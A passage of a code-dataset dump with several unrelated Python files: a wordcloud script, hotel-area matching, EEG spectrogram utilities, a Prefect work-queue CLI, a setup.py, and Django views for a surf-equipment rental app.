\"xml\")\n\n #Finding all instaces of the indicated tag\n\n find_tag = parser_data.find_all('abstract')\n\n #For that is going to concatenate all of the paragraphs\n for paragraph in range(len(find_tag)):\n concat = concat + str(find_tag[paragraph])\n\n concat_ind = concat_ind + str(find_tag[paragraph])\n concat_def = BeautifulSoup(concat_ind, \"lxml\").text\n\n if paragraph+1 == len(find_tag):\n #creating the wordcloud for each paper\n createWordcloud(concat_def,str(i))\n\n i = i+1\n\n concat_ind = \"\" \n\n#For removing xml tags:\nconcat_definite = BeautifulSoup(concat, \"lxml\").text\n\n#creating a wordcloud of all of the pdf abstracts\ncreateWordcloud(concat_definite, \"_all_papers\")\n","sub_path":"2ndAssigment/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248212401","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport json\nimport linecache\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\n\ndef write2file(file_name, content):\n\tfile_object = open(file_name, 'a')\n\tfile_object.write(content)\n\tfile_object.close()\n\n\ndef init_city_id_name_map(in_file):\n\tcity_id_name_map = {}\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tsplit_fields = i_line.split('\\t')\n\t\tcity_id_name_map[unicode(split_fields[1].strip())] = split_fields[0].strip()\n\treturn city_id_name_map\n\n\ndef flat_accommodation_info(in_file, out_file):\n\t# 初始化城市ID和名称的MAP\n\tcity_id_name_map = init_city_id_name_map(file_city_id_name_mapping)\n\n\tpattern = re.compile(u'若以(.*?)[作]?为考量')\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tjson_obj = json.loads(i_line)\n\t\tdestination = json_obj['destination']\n\t\taccommodation_info = json_obj['accommodation_info']\n\t\tfor info in accommodation_info.split('\\n'):\n\t\t\tjudge = '概述'\n\t\t\tcity_code = 'CITY_CODE'\n\t\t\tm = pattern.search(info)\n\t\t\tif m is not None:\n\t\t\t\tjudge = m.group(1)\n\t\t\tif destination in city_id_name_map.keys():\n\t\t\t\tcity_code = city_id_name_map[destination]\n\t\t\tcontent = city_code + '-->' + destination + '-->' + judge + '-->' + info + '\\n'\n\t\t\twrite2file(out_file, content)\n\n\ndef init_business_info_map(in_file):\n\tbusiness_info_map = {}\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tsplit_fields = i_line.split('\\t')\n\t\tbusiness_id = split_fields[0]\n\t\tbusiness_name = split_fields[1]\n\t\tprovince_id = split_fields[2]\n\t\tcity_id = split_fields[3]\n\t\tbusiness_name_en = split_fields[4]\n\n\t\tif city_id not in business_info_map.keys():\n\t\t\tbusiness_list = []\n\t\telse:\n\t\t\tbusiness_list = business_info_map[city_id]\n\t\tbusiness_dict = {}\n\t\tbusiness_dict['id'] = business_id\n\t\tbusiness_dict['cn_name'] = business_name\n\t\tbusiness_dict['en_name'] = business_name_en\n\t\tbusiness_list.append(business_dict)\n\t\tbusiness_info_map[city_id] = business_list\n\treturn business_info_map\n\n\ndef match_business(in_file, out_file):\n\t# 初始化城市ID和名称的MAP\n\tbusiness_info_map = init_business_info_map(file_hotel_business_area)\n\n\tfor i_line_num in range(1, len(open(in_file, 'rU').readlines()) + 1):\n\t\ti_line = linecache.getline(in_file, i_line_num)\n\t\tif 'CITY_CODE' in i_line: continue\n\t\tsplit_fields = i_line.split('-->')\n\t\tcity_id = split_fields[0].strip()\n\t\taccommodation_desc = split_fields[3].strip()\n\t\trelate_business = []\n\t\tif city_id in business_info_map.keys():\n\t\t\tfor business_info in business_info_map[city_id]:\n\t\t\t\tbusiness_id = business_info['id']\n\t\t\t\tbusiness_ch_name = business_info['cn_name']\n\t\t\t\tbusiness_en_name = business_info['en_name']\n\t\t\t\tif business_ch_name in accommodation_desc:\n\t\t\t\t\trelate_business.append(business_ch_name)\n\t\t\t\telif business_en_name in accommodation_desc:\n\t\t\t\t\trelate_business.append(business_en_name)\n\t\tif len(relate_business) > 0:\n\t\t\ti_line = i_line.strip() + '-->' + '@@@@'.join(relate_business) + '\\n'\n\t\telse:\n\t\t\ti_line = i_line.strip() + '-->' + '' + '\\n'\n\t\twrite2file(out_file, i_line)\n\n\nif __name__ == '__main__':\n\tfile_match_step_1 = 'match_step_1.txt'\n\tfile_match_step_2 = 'match_step_2.txt'\n\tfile_accommodation_info = 'accommodation_info.txt'\n\tfile_city_id_name_mapping = 'city_id_name_mapping.txt'\n\tfile_hotel_business_area = 'hotel_business_area.txt'\n\n\t# flat_accommodation_info(file_accommodation_info, file_match_step_1)\n\tmatch_business(file_match_step_1, file_match_step_2)\n","sub_path":"tripadvisor/match_process.py","file_name":"match_process.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"172442529","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 16 17:40:53 2019\n\n@author: Ahmed\n\nThis files gives a few function for signal processoring and displayng\n\n\"\"\"\n\nimport numpy as np\nimport math\n\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as col\nimport matplotlib.mlab as mlab\n\n# makes a spectogram\ndef getFreqArray(data, freqS, fenetre, minFreq, maxFreq):\n '''renvoie la carte temps-fréquence. sous la forme (temps, frequences, mesures[temps][freq])\n Prend en argumant un couple du type (timestamps, datas) où timestamp et data sont des listes\n fenetre est la taille de la fenetre temporel prise autour du temps pour le calcule de la fft\n freqS est la fréquence à laquelle il faut faire des fft sur le signal '''\n fen = fenetre/2\n freqE = len(data[0])/(data[0][-1] - data[0][0])\n n = int(fenetre*freqE)\n t = np.arange(data[0][0] + fen, data[0][-1] - fen, 1./freqS)\n buffer = np.zeros((len(t),n))\n l = [0 for _ in range(len(t))]\n for i in range(len(data[0])):\n for a in range(len(t)):\n if l[a] < n and (t[a] - fen < data[0][i] or n-l[a] >= len(data[0])-i):\n buffer[a, l[a]] = data[1][i]\n l[a] += 1\n freq = np.fft.rfftfreq(n, 1./freqE)\n fmin = 0\n fmax = 0\n for i in freq:\n if i > minFreq:\n break\n fmin += 1\n for i in freq:\n fmax += 1\n if i > maxFreq:\n break\n return (t, freq[fmin:fmax], abs(np.fft.rfft(buffer, norm = 'ortho'))[:,fmin:fmax])\n\n#display spectogram\ndef specto(data, minFreq = 5, maxFreq = 40):\n fig, ax = plt.subplots(figsize=(10,6))\n Pxx = spectoArray(data)\n im = ax.imshow(Pxx, interpolation = 'spline16', extent = (0, 2, minFreq, maxFreq), origin = 'lower')\n ax.set_aspect(aspect = 0.7*2/35)\n fig.colorbar(im)\n return Pxx\n\n\ndef spectoArray(data, minFreq = 5, maxFreq = 40):\n Pxx, freqs, bins = mlab.specgram(data, NFFT=200, Fs=500, noverlap=180, mode = 'magnitude')\n fmin = 0\n fmax = 0\n for i in freqs:\n if i > minFreq:\n break\n fmin += 1\n for i in freqs:\n fmax += 1\n if i > maxFreq:\n break\n Pxx = Pxx[fmin:fmax,:]\n return Pxx\n \ndef getCarteElec(data, freqS, fenetre, minFreq, maxFreq, elec):\n return getFreqArray((data[0], data[elec]), freqS, fenetre, minFreq, maxFreq)[2].flatten()\n\ndef getCarte(data, freqS, fenetre, minFreq, maxFreq):\n ''' renvoie la carte temps-fréquence, à partir de la donné enregistrée'''\n return np.array([getFreqArray((data[0], data[i]), freqS, fenetre, minFreq, maxFreq)[2].flatten() for i in range(1,9) ]).flatten()\n\ndef drawFreqArray(carte):\n m = carte[2].max()\n \n fig, ax = plt.subplots()\n X,Y = np.meshgrid(carte[0], carte[1])\n levels = np.arange(0, m, m/1000.)\n norm = col.Normalize(0, m)\n contour = ax.contourf(X,Y, carte[2].transpose(), levels = levels, norm = norm)\n fig.colorbar(contour)\n ax.set_xlabel(\"temps\")\n ax.set_ylabel(\"fréquence\")\n \n return fig\n\ndef imshowFreqArray(carte):\n fig, ax = plt.subplots(figsize=(10,6))\n Pxx = carte[2]\n freq = carte[1]\n im = ax.imshow(Pxx.transpose(), interpolation = 'spline16', extent = (0, 2, freq[0], freq[-1]), origin = 'lower')\n ax.set_aspect(aspect = 0.7*2/35)\n fig.colorbar(im)\n\ndef drawElectrode(data, elec, freqS, fenetre, minFreq = 5, maxFreq = 40):\n f = getFreqArray((data[0],data[elec]),freqS, fenetre, minFreq, maxFreq)\n drawFreqArray(f)\n \ndef filtreMoyen(data, fenetre):\n '''écart à la moyenne sur la fenetre de fenetre points. data est un array ou une liste monodimensionnelle '''\n fenetre = fenetre//2\n S = sum(data[0:fenetre])\n nb = fenetre\n N = len(data)\n filtrer = np.empty(len(data))\n for i in range(N):\n if i - fenetre >= 0:\n S -= data[i-fenetre]\n nb -= 1\n if i + fenetre < N:\n S += data[i+fenetre]\n nb += 1\n filtrer[i] = data[i] - S/nb\n return filtrer\n\ndef recentrage(data , fen = 0):\n M = sum(data)/len(data)\n return data - M*np.ones(data.shape)\n \ndef Invfft(freq, data, t):\n return [ sum([data[i]*math.sin(2*np.pi*freq[i]*j) for i in range(len(freq)) ]) for j in t ]\n \ndef CompareEle(db, i, elec):\n a = db.loadedSignal[i].data\n b = moy(filtreMoyen(a[elec], 100), 10)\n #b = recentrage(a[elec], 100)\n plt.subplots()\n plt.plot(a[0], a[elec])\n plt.subplots()\n plt.plot(a[0], b)\n \n fig, ax = plt.subplots()\n \n freq = np.fft.rfftfreq(len(a[elec]), 1./500.)\n fmin = 0\n fmax = 0\n for i in freq:\n if i > 5:\n break\n fmin += 1\n for i in freq:\n fmax += 1\n if i > 40:\n break\n plt.plot(np.fft.rfftfreq(len(a[elec]), 1/500.)[fmin:fmax], abs(np.fft.rfft(a[elec], norm = 'ortho'))[fmin:fmax], label = 'non filtré')\n #plt.subplots()\n plt.plot(np.fft.rfftfreq(len(b), 1/500.)[fmin:fmax], abs(np.fft.rfft(b, norm = 'ortho'))[fmin:fmax], label = 'filtré')\n ax.legend()\n \n drawFreqArray(getFreqArray((a[0], a[elec]), 10, 0.5, 5, 40))\n drawFreqArray(getFreqArray((a[0], b), 50, 0.5, 5, 40))\n \ndef moy(data, fenetre):\n '''convolution'''\n fenetre = fenetre//2\n S = sum(data[0:fenetre])\n nb = fenetre\n N = len(data)\n filtrer = np.empty(len(data))\n for i in range(N):\n if i - fenetre >= 0:\n S -= data[i-fenetre]\n nb -= 1\n if i + fenetre < N:\n S += data[i+fenetre]\n nb += 1\n filtrer[i] = S/nb\n return filtrer\n \ndef filtreSignal(s, fenetreLine, fenetreMoy = 10):\n '''applique le filtreMoyen pour supprimer les déviation linéaire et recentrer avec suppression des bords pour éviter les déviations\n puis moyenne pour couper la fréquence 50Hz'''\n return np.array( [s[0]] +\n [moy(filtreMoyen(s[i], fenetreLine), fenetreMoy) for i in range(1, 9)])\n \n\n \n \n \n \n \n \n ","sub_path":"carte.py","file_name":"carte.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"374240165","text":"\"\"\"\nCommand line interface for working with work queues.\n\"\"\"\nfrom typing import List\nfrom uuid import UUID\n\nimport anyio\nimport pendulum\nimport typer\nfrom rich.pretty import Pretty\nfrom rich.table import Table\n\nfrom prefect.cli.base import (\n PrefectTyper,\n app,\n console,\n exit_with_error,\n exit_with_success,\n)\nfrom prefect.client import get_client\nfrom prefect.exceptions import ObjectAlreadyExists, ObjectNotFound\n\nwork_app = PrefectTyper(name=\"work-queue\", help=\"Commands for work queue CRUD.\")\napp.add_typer(work_app)\n\n\n@work_app.command()\nasync def create(\n name: str = typer.Argument(..., help=\"The unique name to assign this work queue\"),\n tags: List[str] = typer.Option(\n None, \"-t\", \"--tag\", help=\"One or more optional tags\"\n ),\n deployment_ids: List[UUID] = typer.Option(\n None, \"-d\", \"--deployment\", help=\"One or more optional deployment IDs\"\n ),\n flow_runner_types: List[str] = typer.Option(\n None, \"-fr\", \"--flow-runner\", help=\"One or more optional flow runner types\"\n ),\n):\n \"\"\"\n Create a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n result = await client.create_work_queue(\n name=name,\n tags=tags or None,\n deployment_ids=deployment_ids or None,\n flow_runner_types=flow_runner_types or None,\n )\n except ObjectAlreadyExists:\n exit_with_error(f\"Work queue with name: {name!r} already exists.\")\n\n console.print(Pretty(result))\n\n\n@work_app.command()\nasync def set_concurrency_limit(\n id: UUID = typer.Argument(..., help=\"The id of the work queue\"),\n limit: int = typer.Argument(..., help=\"The concurrency limit to set on the queue.\"),\n):\n \"\"\"\n Set a concurrency limit on a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n concurrency_limit=limit,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Concurrency limit of {limit} set on work queue {id}\")\n\n\n@work_app.command()\nasync def clear_concurrency_limit(\n id: UUID = typer.Argument(..., help=\"The id of the work queue to clear\"),\n):\n \"\"\"\n Clear any concurrency limits from a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n concurrency_limit=None,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Concurrency limits removed on work queue {id}\")\n\n\n@work_app.command()\nasync def pause(\n id: UUID = typer.Argument(..., help=\"The ID of the work queue to pause.\"),\n):\n \"\"\"\n Pause a work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n is_paused=True,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Paused work queue {id}\")\n\n\n@work_app.command()\nasync def resume(\n id: UUID = typer.Argument(..., help=\"The ID of the work queue to resume.\"),\n):\n \"\"\"\n Resume a paused work queue.\n \"\"\"\n async with get_client() as client:\n try:\n await client.update_work_queue(\n id=id,\n is_paused=False,\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Resumed work queue {id}\")\n\n\n@work_app.command()\nasync def inspect(id: UUID):\n \"\"\"\n Inspect a work queue by ID.\n \"\"\"\n async with get_client() as client:\n try:\n result = await client.read_work_queue(id=id)\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n console.print(Pretty(result))\n\n\n@work_app.command()\nasync def ls(\n verbose: bool = typer.Option(\n False, \"--verbose\", \"-v\", help=\"Display more information.\"\n )\n):\n \"\"\"\n View all work queues.\n \"\"\"\n table = Table(\n title=\"Work Queues\", caption=\"(**) denotes a paused queue\", caption_style=\"red\"\n )\n table.add_column(\"ID\", justify=\"right\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Name\", style=\"green\", no_wrap=True)\n table.add_column(\"Concurrency Limit\", style=\"blue\", no_wrap=True)\n if verbose:\n table.add_column(\"Filter\", style=\"magenta\", no_wrap=True)\n\n async with get_client() as client:\n queues = await client.read_work_queues()\n\n sort_by_created_key = lambda q: pendulum.now(\"utc\") - q.created\n\n for queue in sorted(queues, key=sort_by_created_key):\n\n row = [\n str(queue.id),\n f\"{queue.name} [red](**)\" if queue.is_paused else queue.name,\n f\"[red]{queue.concurrency_limit}\"\n if queue.concurrency_limit\n else \"[blue]None\",\n ]\n if verbose:\n row.append(queue.filter.json())\n table.add_row(*row)\n\n console.print(table)\n\n\n@work_app.command()\nasync def preview(\n id: UUID = typer.Argument(..., help=\"The id of the work queue\"),\n hours: int = typer.Option(\n None,\n \"-h\",\n \"--hours\",\n help=\"The number of hours to look ahead; defaults to 1 hour\",\n ),\n):\n \"\"\"\n Preview a work queue.\n \"\"\"\n table = Table(caption=\"(**) denotes a late run\", caption_style=\"red\")\n table.add_column(\n \"Scheduled Start Time\", justify=\"left\", style=\"yellow\", no_wrap=True\n )\n table.add_column(\"Run ID\", justify=\"left\", style=\"cyan\", no_wrap=True)\n table.add_column(\"Name\", style=\"green\", no_wrap=True)\n table.add_column(\"Deployment ID\", style=\"blue\", no_wrap=True)\n\n window = pendulum.now(\"utc\").add(hours=hours or 1)\n async with get_client() as client:\n try:\n runs = await client.get_runs_in_work_queue(\n id, limit=10, scheduled_before=window\n )\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n now = pendulum.now(\"utc\")\n sort_by_created_key = lambda r: now - r.created\n\n for run in sorted(runs, key=sort_by_created_key):\n table.add_row(\n f\"{run.expected_start_time} [red](**)\"\n if run.expected_start_time < now\n else f\"{run.expected_start_time}\",\n str(run.id),\n run.name,\n str(run.deployment_id),\n )\n\n if runs:\n console.print(table)\n else:\n console.print(\n \"No runs found - try increasing how far into the future you preview with the --hours flag\",\n style=\"yellow\",\n )\n\n\n@work_app.command()\nasync def delete(id: UUID):\n \"\"\"\n Delete a work queue by ID.\n \"\"\"\n async with get_client() as client:\n try:\n await client.delete_work_queue_by_id(id=id)\n except ObjectNotFound:\n exit_with_error(f\"No work queue found with id {id}\")\n\n exit_with_success(f\"Deleted work queue {id}\")\n","sub_path":"src/prefect/cli/work_queue.py","file_name":"work_queue.py","file_ext":"py","file_size_in_byte":7149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"232372825","text":"import os\nimport pathlib\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\ncfg = pathlib.Path('pytest.ini')\nis_pytest_config_exists = pathlib.Path('pytest.ini').exists()\nif os.getenv('ENV') == 'DEV':\n if not is_pytest_config_exists:\n os.symlink('pytest.dev.ini', 'pytest.ini', )\n else:\n os.remove(str(cfg))\n os.symlink('pytest.dev.ini', 'pytest.ini', )\n\nelse:\n if not is_pytest_config_exists:\n os.symlink('pytest.default.ini', 'pytest.ini')\n else:\n os.remove(str(cfg))\n os.symlink('pytest.default.ini', 'pytest.ini')\n\nsetup(\n packages=find_packages(),\n setup_requires=[\"pytest-runner\"],\n install_requires=[],\n tests_require=['pytest==4.0.1', 'pytest-mock==1.10.0', 'coverage>=4.5.2',\n 'pytest-cov==2.6.0', 'pytest-asyncio>=0.9.0'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"500530175","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom surf_rental.forms import LoginForm, PersonalInfoForm\nfrom surf_rental.forms import SignUpForm, AddWindboardsForm, AddWindsailForm, AddKiteboardsForm, AddKiteForm, \\\n SignUpFormSuperUser\nfrom surf_rental.models import UserProfile, Storage, WindBoard, RentalWindBoard, WindSail, RentalWindSail, KiteKite, \\\n KiteBoard, RentalKite, RentalKiteBoard\nimport datetime\n\nfrom django.template.defaulttags import register\n\n\n\n\n\n# Create your views here.\n\nclass HomePageView(View):\n def get(self, request):\n form = LoginForm()\n return render(request, 'base.html', {'form': form})\n\n def post(self, request):\n form = LoginForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/next/')\n form = LoginForm()\n # return render(request, 'homepage.html', {'msg':'zalogowano'})\n return render(request, 'base.html',\n {'form': form, 'msg_error': 'NIE UDAŁO SIĘ ZALOGOWAĆ, SPRÓBUJ JESZCZE RAZ'})\n\n\nclass UserCreation(View):\n\n def get(self, request):\n form = SignUpForm()\n form_2 = PersonalInfoForm()\n return render(request, 'UserCreation.html', {'form': form, 'form2': form_2})\n\n def post(self, request, commit=True):\n new_contact = form = SignUpForm(request.POST)\n form_2 = PersonalInfoForm(request.POST)\n\n if form.is_valid():\n instance = form.save()\n users_id = instance.id\n\n if form_2.is_valid():\n phone = form_2.cleaned_data['phone']\n city = form_2.cleaned_data['city']\n birth_date = form_2.cleaned_data['birth_date']\n sex = form_2.cleaned_data['sex']\n street = form_2.cleaned_data['country']\n post_code = form_2.cleaned_data['post_code']\n country = form_2.cleaned_data['country']\n user_profile = UserProfile.objects.create(user_id=users_id, phone=phone, birth_date=birth_date, sex=sex,\n city=city, street=street, post_code=post_code,\n country=country)\n\n return HttpResponse(f'UDało sie stworzyć użytkownika {users_id}')\n return render(request, 'UserCreation.html', {'form': form, 'form2': form_2})\n\n\nclass LogOut(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n logout(request)\n msg = 'wylogowano'\n return HttpResponseRedirect('/')\n\n\nclass HomeView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n # template_name = \"base.html\"\n login_url = \"/\"\n redirect_field_name = \"redirect_to\"\n\n def get(self, request):\n return render(request, 'homepage.html')\n\n\nclass WindSurfView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'wind.html',\n {'boards': WindBoard.objects.all(), 'learning': WindBoard.objects.filter(type=1),\n 'freeride': WindBoard.objects.filter(type=2)})\n\n def post(self, request):\n date = request.POST.get('date')\n hour_from = int(request.POST.get('hour_from'))\n hour_to = int(request.POST.get('hour_to'))\n print(date, hour_from, hour_to)\n boards = WindBoard.objects.all()\n sails = WindSail.objects.all()\n\n available_boards = []\n available_sails = []\n date_now = str(datetime.date.today())\n\n if date_now > date:\n msg = 'Data z przeszłości'\n return render(request, 'wind.html', {'msg_storage': msg})\n if hour_to < hour_from:\n msg = 'źle zadeklarowałeś godziny'\n return render(request, 'wind.html', {'msg_storage': msg})\n\n for sail in sails:\n rentals_windsail = RentalWindSail.objects.filter(windsail=sail, date=date)\n if len(rentals_windsail) == 0:\n available_sails.append(sail)\n else:\n can_be_added = True\n for i in rentals_windsail:\n if i.hour_from < hour_to or i.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_sails.append(sail)\n\n for board in boards:\n rentals_windboard = RentalWindBoard.objects.filter(windboard=board, date=date)\n if len(rentals_windboard) == 0:\n available_boards.append(board)\n else:\n can_be_added = True\n for r in rentals_windboard:\n if r.hour_from < hour_to or r.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_boards.append(board)\n\n request.session['date'] = date\n request.session['hour_to'] = hour_to\n request.session['hour_from'] = hour_from\n print(available_sails, available_boards)\n\n return render(request, 'windrental.html',\n {'boards': available_boards, 'learning': WindBoard.objects.filter(type=1),\n 'freeride': WindBoard.objects.filter(type=2), 'sails': available_sails})\n\n\n################### przerobka na KITESURFVIEW\n\nclass KiteSurfView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'kite.html', {'boards': KiteBoard.objects.all()})\n\n def post(self, request):\n date = request.POST.get('date')\n hour_from = int(request.POST.get('hour_from'))\n hour_to = int(request.POST.get('hour_to'))\n print(date, hour_from, hour_to)\n boards = KiteBoard.objects.all()\n kites = KiteKite.objects.all()\n available_boards = []\n available_kites = []\n date_now = str(datetime.date.today())\n print(boards, kites)\n\n if date_now > date:\n msg = 'Data z przeszłości'\n return render(request, 'kite.html', {'msg_storage': msg})\n if hour_to < hour_from:\n msg = 'źle zadeklarowałeś godziny'\n return render(request, 'kite.html', {'msg_storage': msg})\n\n for kite in kites:\n rentals_kites = RentalKite.objects.filter(kite=kite, date=date)\n if len(rentals_kites) == 0:\n available_kites.append(kite)\n else:\n can_be_added = True\n for i in rentals_kites:\n if i.hour_from < hour_to or i.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_kites.append(kite)\n\n for board in boards:\n rentals_kiteboard = RentalKiteBoard.objects.filter(kiteboard=board, date=date)\n if len(rentals_kiteboard) == 0:\n available_boards.append(board)\n else:\n can_be_added = True\n for r in rentals_kiteboard:\n if r.hour_from < hour_to or r.hour_to > hour_from: # psuja\n can_be_added = False\n break\n if can_be_added:\n available_boards.append(board)\n\n request.session['date'] = date\n request.session['hour_to'] = hour_to\n request.session['hour_from'] = hour_from\n\n return render(request, 'kiterental.html',\n {'boards': available_boards, 'kites': available_kites})\n\n\n############################################3\n\n\n# class KiteSurfView(View):\n# def get(self, request):\n# return render(request, 'kite.html')\n#\n# def post(self, request):\n# type = 'kitesurfing'\n# board_description = request.POST.get('board_description')\n# sail_kite_description = request.POST.get('kite_sail_description')\n# sail_or_kite=2\n# current_user = request.user\n# id= current_user.id\n# new = Storage.objects.create(type=type, board_description=board_description, sail_kite_description=sail_kite_description, owner_id=id, sail_or_kite=sail_or_kite)\n# return HttpResponseRedirect('/next')\n\n\nclass WindRentalView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'windrental.html')\n # def post(self, request):\n # return HttpResponse('k')\n\n\nclass KiteRentalView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'kiterental.html')\n # def post(self, request):\n # return HttpResponse('k')\n\n\nclass AdminView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'adminview.html')\n\n def post(self, request):\n pass\n\n\nclass MyProfileView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n\n rentals_wind_board = RentalWindBoard.objects.filter(user_id=id)\n rentals_wind_sail = RentalWindSail.objects.filter(user_id=id)\n rentals_kite_kite = RentalKite.objects.filter(user_id=id)\n rentals_kite_board = RentalKiteBoard.objects.filter(user_id=id)\n storage = Storage.objects.filter(owner_id=id)\n price_per_day = 10\n prices = {}\n\n for item in storage:\n time_diff = datetime.date.today() - item.date\n\n print('datetime.date.today()', datetime.date.today(), 'item.date', item.date, 'dupa', time_diff.days)\n prices[item.id] = price_per_day * (time_diff.days + 1)\n\n context = {'rentals_wind_board': rentals_wind_board,\n 'rentals_wind_sail': rentals_wind_sail,\n 'rentals_kite_kite': rentals_kite_kite,\n 'rentals_kite_board': rentals_kite_board,\n 'storage': storage,\n 'user': user,\n 'prices': prices}\n\n return render(request, 'profile.html', context)\n\n\nclass SaveKiteReservationView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def post(self, request):\n current_user = request.user\n id = current_user.id\n board_id = request.POST.get('radio_board')\n sail_id = request.POST.get('radio_sail')\n date_1 = request.session.get('date')\n hour_from = request.session.get('hour_from')\n hour_to = request.session.get('hour_to')\n\n print(date_1, hour_from, hour_to)\n if board_id != None:\n new_board = RentalKiteBoard.objects.create(user_id=id, kiteboard_id=board_id, date=date_1,\n hour_from=hour_from, hour_to=hour_to)\n if sail_id != None:\n new_sail = RentalKite.objects.create(user_id=id, kite_id=sail_id, date=date_1, hour_from=hour_from,\n hour_to=hour_to)\n\n storage_user = Storage.objects.filter(owner_id=id)\n kiteboard_rentals_user = RentalKiteBoard.objects.filter(user_id=id)\n kite_rentals_user = RentalKite.objects.filter(user_id=id)\n user = User.objects.get(id=id)\n user_profile = UserProfile.objects.filter(user_id=id)\n context = {\n 'user': user,\n 'user_profile': user_profile,\n 'kiteboard_rental': kiteboard_rentals_user,\n 'kite_rental': kite_rentals_user,\n 'storage': storage_user\n }\n\n return render(request, 'profile.html', context)\n\n\nclass SaveWindReservationView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def post(self, request):\n current_user = request.user\n id = current_user.id\n board_id = request.POST.get('radio_board')\n sail_id = request.POST.get('radio_sail')\n date_1 = request.session.get('date')\n hour_from = request.session.get('hour_from')\n hour_to = request.session.get('hour_to')\n\n print(date_1, hour_from, hour_to)\n if board_id != None:\n new_board = RentalWindBoard.objects.create(user_id=id, windboard_id=board_id, date=date_1,\n hour_from=hour_from, hour_to=hour_to)\n if sail_id != None:\n new_sail = RentalWindSail.objects.create(user_id=id, windsail_id=sail_id, date=date_1, hour_from=hour_from,\n hour_to=hour_to)\n\n storage_user = Storage.objects.filter(owner_id=id)\n windboard_rentals_user = RentalWindBoard.objects.filter(user_id=id)\n windsail_rentals_user = RentalWindSail.objects.filter(user_id=id)\n user = User.objects.get(id=id)\n user_profile = UserProfile.objects.filter(user_id=id)\n context = {\n 'user': user,\n 'user_profile': user_profile,\n 'windboard_rental': windboard_rentals_user,\n 'windsail_rental': windsail_rentals_user,\n 'storage': storage_user\n }\n return render(request, 'profile.html', context)\n\n\nclass PersonalDataView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n context = {'user': user}\n if user.is_superuser:\n context.update({\n 'error_msg': 'UWAGA, jesteś na profilu ADMIN, jeśli pola w formularzu nie są wypełnione, uzupełnij WSZYSTKIE'})\n else:\n userprofile = UserProfile.objects.get(user_id=id)\n p = user.userprofile\n context.update({'personal': p})\n context.update({'phone': p.phone})\n context.update({'sex': p.sex})\n context.update({'city': p.city})\n context.update({'street': p.street})\n context.update({'post': p.post_code})\n context.update({'birth': p.birth_date})\n context.update({'country': p.country})\n\n print(id)\n return render(request, 'personaldata.html', context)\n\n def post(self, request):\n birth_date = request.POST.get('birthdate')\n print(birth_date)\n phone = request.POST.get('phone')\n sex = 